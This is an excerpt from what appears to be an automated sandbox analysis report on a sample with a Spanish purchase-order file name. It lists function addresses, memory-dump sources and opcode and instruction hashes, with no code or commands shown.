Instruction Fuzzy Hash: 30313E702106018FD754DB28C448BAA77E6FF89311F5185AAE15ECB3A1DF71AC46DB50

Function 07521150 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1545045611.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b129d6936a6ed608abffb48f84e14e54f6af1bf25da6b853384ffd6eac59d4c3
Instruction ID: 322f2913ad8dd3fd54b106bf58b9e2eff28783b60727466cdfcebc7111abdd98
Opcode Fuzzy Hash: b129d6936a6ed608abffb48f84e14e54f6af1bf25da6b853384ffd6eac59d4c3
Instruction Fuzzy Hash: C731FF32D10B0ADACB01EFA8C854899F7B1FF95300B119B5AE95967221FB30E695CB81

Function 02147F08 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1532600831.0000000002140000.00000040.00000800.00020000.00000000.sdmp, Offset: 02140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2140000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 811073cda429010a83861283cb4904f23691682e2973cdf0aac32dd27684170d
Instruction ID: 978a1f66ebf2afb97c7a914e6d1925a90fce54dfb94c805ba2fa8454a0f8e172
Opcode Fuzzy Hash: 811073cda429010a83861283cb4904f23691682e2973cdf0aac32dd27684170d
Instruction Fuzzy Hash: 6A219D35740621CBD729AA69D85493AB392FB887557054279E92ACB394CF35DC02CBC0

Function 07520FA0 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1545045611.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63ad00a32ab722de74fde3db8100b24e3ad3c9b3f13e28c039e5a9abb2470dab
Instruction ID: 3c310210325abe0f98330c7e8d7abae9aee7cae8d230354ebeee93d5b556a09d
Opcode Fuzzy Hash: 63ad00a32ab722de74fde3db8100b24e3ad3c9b3f13e28c039e5a9abb2470dab
Instruction Fuzzy Hash: 1721B1353042605FF705A768D820BAF7B97EBC5708F04406BE142DB7EACEB9AC1653A1

Function 02146D59 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1532600831.0000000002140000.00000040.00000800.00020000.00000000.sdmp, Offset: 02140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2140000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8620105a92952dda6eb5dbd3ffc6a8d9e26e32a4807f23999efed16b7a746608
Instruction ID: e0b324245433e13731d15c9c96898a53801dafbbdc487cdc72c30fce120a60b0
Opcode Fuzzy Hash: 8620105a92952dda6eb5dbd3ffc6a8d9e26e32a4807f23999efed16b7a746608
Instruction Fuzzy Hash: 612101B1745198DFE708AF19E908B3B37A5EB85318F004029F9498B365CF3ADD56DB90

Function 0080D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1531895683.000000000080D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0080D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80d000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5eeb76f848362276e6b61a9f93a1eb687dc67143cd5e2f6499a989ada7ad01fe
Instruction ID: 4d7dde5be7f92e180b43617f31d88b855e6c4a35cde36348b802bc617480c8e4
Opcode Fuzzy Hash: 5eeb76f848362276e6b61a9f93a1eb687dc67143cd5e2f6499a989ada7ad01fe
Instruction Fuzzy Hash: F7210471604344EFDB45DF94D9C0B26BBA5FB84318F24C5ADE8098B2D2C736E846CB61

Function 0080D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1531895683.000000000080D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0080D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80d000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1b5414fd0d4ed8d6baf6c33a5d8278925fd7e61651fd77110ae250ccffda353
Instruction ID: ce6a4e4547a2e8e3aaf843d744b15d38eac817c9b995e31920615b0d0c6a8872
Opcode Fuzzy Hash: e1b5414fd0d4ed8d6baf6c33a5d8278925fd7e61651fd77110ae250ccffda353
Instruction Fuzzy Hash: CC21F271604744DFDB54DF54D9C0B26BB65FB84318F24C569D80E8B2C6C73AD847CA62

Function 07525D07 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1545045611.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d669a1c236e92aa1cc54d3d13f7c5d0e570cd45b87fa4b15ec8da6ca74947189
Instruction ID: 122a9ab681a1e798eba1e30eb8589bf1a0751d6242a004aed93f293e51a85988
Opcode Fuzzy Hash: d669a1c236e92aa1cc54d3d13f7c5d0e570cd45b87fa4b15ec8da6ca74947189
Instruction Fuzzy Hash: 60115FB03003109FE7248665D848BEA73AAFB86328F0484AAE8558B2C1CB70E9078390

Function 06B7CC38 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1544664755.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b70000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0033619901660b70f25e5c0c789b83375fd30bdceacc1d27cbbfd6bf465197aa
Instruction ID: e9fc224e234203f3c43eb0500e8656e5aa85e486fae7ed7e46711b5c420e7024
Opcode Fuzzy Hash: 0033619901660b70f25e5c0c789b83375fd30bdceacc1d27cbbfd6bf465197aa
Instruction Fuzzy Hash: 52110370B101088FE704BFBDDC49A6EBFB6EF84A50F914529E544E3244DB349D19C7A2

Function 0214D760 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1532600831.0000000002140000.00000040.00000800.00020000.00000000.sdmp, Offset: 02140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2140000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f57649105212147fd0c521eda622a699879ce93a24f0db0eb7c903b02cd21639
Instruction ID: ecc295817afa32921c08b4628241560f9b267e993d4021fd20377c5b72a89555
Opcode Fuzzy Hash: f57649105212147fd0c521eda622a699879ce93a24f0db0eb7c903b02cd21639
Instruction Fuzzy Hash: AD219E70A4021AEBEF18DFA4E994BBEBBB5AF44704F10402DE805A7350DF35D945DB90

Function 0752A2D4 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1545045611.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 764f2b306bb8fc07f042c72b39d5329d5322dceff2cb6b151e0a7c955714d5fc
Instruction ID: 1b41ef865b7ac74ec98f631c1fd7740ff52713ffeab4f555167aa3a1e4eada1f
Opcode Fuzzy Hash: 764f2b306bb8fc07f042c72b39d5329d5322dceff2cb6b151e0a7c955714d5fc
Instruction Fuzzy Hash: AF11B171710215CFD724AF38C45089D77B5FF87211B5445AEE006CB3A1EE31E846DB62

Function 07520FB0 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1545045611.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c989a83d608c97fcdd74740d4299efb60a303be9196d76482ddbec34a9a7683
Instruction ID: 330ac1d9fc222f06b2f15ec2a5b9e0d683a33199c525a5b81fae7310b4eef415
Opcode Fuzzy Hash: 3c989a83d608c97fcdd74740d4299efb60a303be9196d76482ddbec34a9a7683
Instruction Fuzzy Hash: 50118F393006205BF704666DD810B6F76D7EBC4B18F04802AE206DB7D9CEB9AC125791

Function 02147EF8 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1532600831.0000000002140000.00000040.00000800.00020000.00000000.sdmp, Offset: 02140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2140000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c26a2e5266df7348c660310d6d0ff2c20e3ca339bd116b91acfed95ad36c86b9
Instruction ID: b3c44f5f2cb1b6641a301de8643ad97967bfe536556d51fdd33b1f3067a75329
Opcode Fuzzy Hash: c26a2e5266df7348c660310d6d0ff2c20e3ca339bd116b91acfed95ad36c86b9
Instruction Fuzzy Hash: 18119D317416128BD719AB69D45493ABBA6FB88761709427DE51ACB3A0CF35CC038BD0

Function 021473F8 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1532600831.0000000002140000.00000040.00000800.00020000.00000000.sdmp, Offset: 02140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2140000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f516b9b8dbd9b331c5ee31009964daf304f41384d5e8251aaf6f8252c6b3c23d
Instruction ID: 45c3a487b233d1ad37d5607a384460bc08fa04b8b763756febc84e71bcad0795
Opcode Fuzzy Hash: f516b9b8dbd9b331c5ee31009964daf304f41384d5e8251aaf6f8252c6b3c23d
Instruction Fuzzy Hash: 5E110430740744CFD7259B35D80472AFBE6AF85304F08895DC05E876A2DFB8E80A8B51

Function 0214F9D1 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1532600831.0000000002140000.00000040.00000800.00020000.00000000.sdmp, Offset: 02140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2140000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02750320a2909e93a7f9624073b365640d4324cf8fa222de58fd78bac43ffbc0
Instruction ID: 44f90b22a3bcf542b428c15a33a624f201a421596a3766100c369b04322a1ae9
Opcode Fuzzy Hash: 02750320a2909e93a7f9624073b365640d4324cf8fa222de58fd78bac43ffbc0
Instruction Fuzzy Hash: 181104B0B85211DFE3148A29C5517763B92ABC9308F28C0BEE1198F7A5EB36C8039791

Function 07525D18 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1545045611.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2867cc4907498a1b2cc6ead7bec5eb9e4b7a5c1e093ae67d0a3df7095b904a99
Instruction ID: e1723b9d9d3a1aaa7ed16720e661e15fc31e7a03ebaa214d91b4bafa2e8f5545
Opcode Fuzzy Hash: 2867cc4907498a1b2cc6ead7bec5eb9e4b7a5c1e093ae67d0a3df7095b904a99
Instruction Fuzzy Hash: 7311E1743003149FE728D669C858BABB397FBCA724F14C46AE5598B2D0DB74E9079780

Function 021479A1 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1532600831.0000000002140000.00000040.00000800.00020000.00000000.sdmp, Offset: 02140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2140000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08d0f71f1adab17223b63ecf43974a3bea8fb573103b832f7707081dbfa4a5ae
Instruction ID: 9f458a1923c741e0583e605ff8465eb3a8900267870104f63e1703190c5dddaa
Opcode Fuzzy Hash: 08d0f71f1adab17223b63ecf43974a3bea8fb573103b832f7707081dbfa4a5ae
Instruction Fuzzy Hash: 42119D31A401148FC714DF28D948B69FBB2EB84721F19816AE81E8B3C1DB75DA42C790

Function 06B71088 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1544664755.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b70000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 705c70c87ebf6c1f07de62642a500776c3cf9661e1e3f0c5d58c297e9415dbb0
Instruction ID: 8b204602758ffa50f6860fc2d9c0c236ab2cf42e26b6591349f9a5584921d1cd
Opcode Fuzzy Hash: 705c70c87ebf6c1f07de62642a500776c3cf9661e1e3f0c5d58c297e9415dbb0
Instruction Fuzzy Hash: 8311F971D0070A8ECB51DFADD8404DEFBB4FF48310F14966AD559B7211EB30A695CB90

Function 06B71C10 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1544664755.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b70000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d501b281b06494a7c1c23667eb4cce195a12f191a60363bf9b4f57e4dd8af48c
Instruction ID: 201709fe481376c2b33033deab7ec8a0717a4f4b13f453bbed5e3b513436740d
Opcode Fuzzy Hash: d501b281b06494a7c1c23667eb4cce195a12f191a60363bf9b4f57e4dd8af48c
Instruction Fuzzy Hash: 8A0161763042046FD3109B5EDC84E96FBEDEFC9620B15806AF509C7361C971AC0186A4

Function 0214AE70 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1532600831.0000000002140000.00000040.00000800.00020000.00000000.sdmp, Offset: 02140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2140000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0bb2444240cf9eaab965de2f4e4060985a41c6a206cb5d912a91cdf82518845c
Instruction ID: adb287f4c520651decc817c829658c7d35bd8de34b3b1ade638e3f66bdd3b3cd
Opcode Fuzzy Hash: 0bb2444240cf9eaab965de2f4e4060985a41c6a206cb5d912a91cdf82518845c
Instruction Fuzzy Hash: EA118E76B401049FCB148F58C954BEEBBBAFF8C610F144029E916A7390DB72AC01CB90

Function 06B71D18 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1544664755.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b70000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b6fdfb8b3716ee4a259a8f4612969777d8e4565f001228476054ce7bebcc1de
Instruction ID: ee4e3ee3dd6b82a8e4df04a8bf039d9f14b282597034d2334aa88cc373303150
Opcode Fuzzy Hash: 9b6fdfb8b3716ee4a259a8f4612969777d8e4565f001228476054ce7bebcc1de
Instruction Fuzzy Hash: E7012BB2B146155B5B15EA7D5C605BFA7EBEFD415030A843AD158D7304DE308C0387A2

Function 0214D750 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1532600831.0000000002140000.00000040.00000800.00020000.00000000.sdmp, Offset: 02140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2140000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8779c0ca70098ac0cac6ede724dc2c222ffb7259447ce72caf8331e91d8bf231
Instruction ID: 08be5da8a2e2c89000ed30453ecba5179b9934c98149bf9e9238f449d220ed43
Opcode Fuzzy Hash: 8779c0ca70098ac0cac6ede724dc2c222ffb7259447ce72caf8331e91d8bf231
Instruction Fuzzy Hash: F3119370A40219DBDB18DF65E994BAEBBB1FF84704F10812DD801A7350DF39D942DB80

Function 0080D017 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1531895683.000000000080D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0080D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80d000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28438b8e5df5b950c11fefaffa2857c44627f795013170cdc6b2abec7484ea9f
Instruction ID: 4c1095511b6891c335f401cedc7673f0b362ea728daa719ec5aa0daaae023453
Opcode Fuzzy Hash: 28438b8e5df5b950c11fefaffa2857c44627f795013170cdc6b2abec7484ea9f
Instruction Fuzzy Hash: F9118B75504780DFCB15CF54D9C4B15BBA2FB84314F28C6AAD84D8B696C33AD84ACFA2

Function 0080D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1531895683.000000000080D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0080D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80d000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28438b8e5df5b950c11fefaffa2857c44627f795013170cdc6b2abec7484ea9f
Instruction ID: 9e2f103a98277d43be33fefa7eb7af513c9b023c968d8fad035d61912bba4213
Opcode Fuzzy Hash: 28438b8e5df5b950c11fefaffa2857c44627f795013170cdc6b2abec7484ea9f
Instruction Fuzzy Hash: CD11DD75504380DFDB41CF54C9C0B15FBA2FB84314F28C6AED8498B696C33AE84ACB61

Function 07528B09 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1545045611.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66adb4bc70ee816a0cd054fd564f2017615f6ce8da84846155d6a81d4d4ac873
Instruction ID: 14450c409739328e7004b9f5e92c79fda0b94a347f2ec5ead9914617690cb8c2
Opcode Fuzzy Hash: 66adb4bc70ee816a0cd054fd564f2017615f6ce8da84846155d6a81d4d4ac873
Instruction Fuzzy Hash: AC119171200B508FD725EB29D80464B77E6EB89324F108B1DE096876A0DB78A8078B91

Function 0752EDE8 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1545045611.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73c63665a4629cfa90fb93ce3442573e4eda9d7eb93f7e755173df5900351301
Instruction ID: 4467964861edf35a9e01321e2c07f63509d0c4ac1b4d0d705574845e32a1f230
Opcode Fuzzy Hash: 73c63665a4629cfa90fb93ce3442573e4eda9d7eb93f7e755173df5900351301
Instruction Fuzzy Hash: BA018F747101148FA605B738D459A7F73D7ABCA65071940AAEA06CB3A0DE74EC0397A2

Function 07521BE0 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1545045611.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5157d087bdbb237bdc6886a3f54ebcbafc9fbdf54e950e47a3f543a13900260
Instruction ID: c3c11bceae5c7baa148d09d30f3ca50c6b3adee2320c80516d613b7d67e51378
Opcode Fuzzy Hash: c5157d087bdbb237bdc6886a3f54ebcbafc9fbdf54e950e47a3f543a13900260
Instruction Fuzzy Hash: 95115BB5A0061A9FDB15DF69C884AAF7BF5FF89610F00442AE914D7260DB34D911DBA0

Function 0752C81A Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1545045611.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39d6e2ff66927225fe9b1ee20817a5da0461f7dd2da4a2276f563ced3bfa6aad
Instruction ID: add1078c96eea11091e7cf79c498d1aa6e26fb1d819e6c21e8c2d2f08ba43182
Opcode Fuzzy Hash: 39d6e2ff66927225fe9b1ee20817a5da0461f7dd2da4a2276f563ced3bfa6aad
Instruction Fuzzy Hash: 2C01D6B22042A1CFC7259F39D8508A97BB4BF8721070941AFE046CB2A2DA31D846D761

Function 02144970 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1532600831.0000000002140000.00000040.00000800.00020000.00000000.sdmp, Offset: 02140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2140000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c38d9d8c635aafdcd83fc7013f58d3d0d311d9ac4db6715dfa7492781c723dd
Instruction ID: 5aa874a553d14897467cf67cef1199c288c9ee41e6b09aadda0a60fd63f5314a
Opcode Fuzzy Hash: 8c38d9d8c635aafdcd83fc7013f58d3d0d311d9ac4db6715dfa7492781c723dd
Instruction Fuzzy Hash: 3B018430B486449FEB589FBADC1832A37D6BB8D211F11407A951EC7395EF348800DBA6

Function 021473F7 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1532600831.0000000002140000.00000040.00000800.00020000.00000000.sdmp, Offset: 02140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2140000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f349be06c179834f508ce01d9975220b76107629fb1d8ec4d7a67f4716ab8d3e
Instruction ID: bb5245a9c4f9d8da18916a6e6b3d6eff1a1c717cc9771ae464fabc0c4e29db69
Opcode Fuzzy Hash: f349be06c179834f508ce01d9975220b76107629fb1d8ec4d7a67f4716ab8d3e
Instruction Fuzzy Hash: 7D019230700B058FD735A729D844B6AFBE6AFC4714F188A1DC05E8B6A1DFB4E80A8791

Function 07525B78 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1545045611.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fdc530c21142da0e0ac30454928bcf37db1d329c8e50a7d300a6e5a8638d8a52
Instruction ID: 88735420f701f4efb15810741e631619cf6090e68c965018ffb7e9e05ebc634d
Opcode Fuzzy Hash: fdc530c21142da0e0ac30454928bcf37db1d329c8e50a7d300a6e5a8638d8a52
Instruction Fuzzy Hash: D101B5F2D06633ABD7245F0980006A9F7A4BF46B10B4845ABD418A3A90E730FCA2D7F1

Function 0214BA20 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1532600831.0000000002140000.00000040.00000800.00020000.00000000.sdmp, Offset: 02140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2140000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2eb08c1775fdd854852868e819bd072fc30634a79e3ab851f8476987626106f
Instruction ID: ea0e94f875e338c5cc92c97ff99ba5b9d60407dc21d2e7d1b8e866e1a3ca7db2
Opcode Fuzzy Hash: c2eb08c1775fdd854852868e819bd072fc30634a79e3ab851f8476987626106f
Instruction Fuzzy Hash: 7901DB72B04118ABDB159E599810ABF3BABDBC8790F14802AF919D7280CF75DD11D790

Function 007FD789 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1531834342.00000000007FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 007FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7fd000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45d0b6b624ae34ac47a970be92ab63e920f1dfded3108851b53e1bab7e1b126a
Instruction ID: b44b40e588e4df60bb0b8367f61009e7c3a89943018e792ac6ccce7252b8e1ff
Opcode Fuzzy Hash: 45d0b6b624ae34ac47a970be92ab63e920f1dfded3108851b53e1bab7e1b126a
Instruction Fuzzy Hash: 9C01F2311043489BE730AA16CD80B76FB98EF51320F18C41AEE094E386C67D9C40CAB2

Function 0752EDD9 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1545045611.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c87365562d2cdafd17188a1bd44eddfef38bcb801fd8d14e1300dfd80ef7e41b
Instruction ID: ca715528f19ad71490f11cc2f505ff21aa6f59c94743948fa02dd6f9c1fefcf8
Opcode Fuzzy Hash: c87365562d2cdafd17188a1bd44eddfef38bcb801fd8d14e1300dfd80ef7e41b
Instruction Fuzzy Hash: 8101A4343142108FD705A738E458A7E77E7EBC661131940ABE605CB3A1CE64DC078792

Function 07521EC4 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1545045611.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31c0dfbf1c83b609ab32b3848ec4c55667df0024d7ccd389279a172ed3c5bf94
Instruction ID: 0f8e8e71c7562712db40fc2a1b9f75f09aa0c233d5653c8bc893b782783658f1
Opcode Fuzzy Hash: 31c0dfbf1c83b609ab32b3848ec4c55667df0024d7ccd389279a172ed3c5bf94
Instruction Fuzzy Hash: F4F0C2713141728BD6189A3A88889BA33DDBFC6A11306482EE406CB3B0DF24EC03A758

Function 02149EF0 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

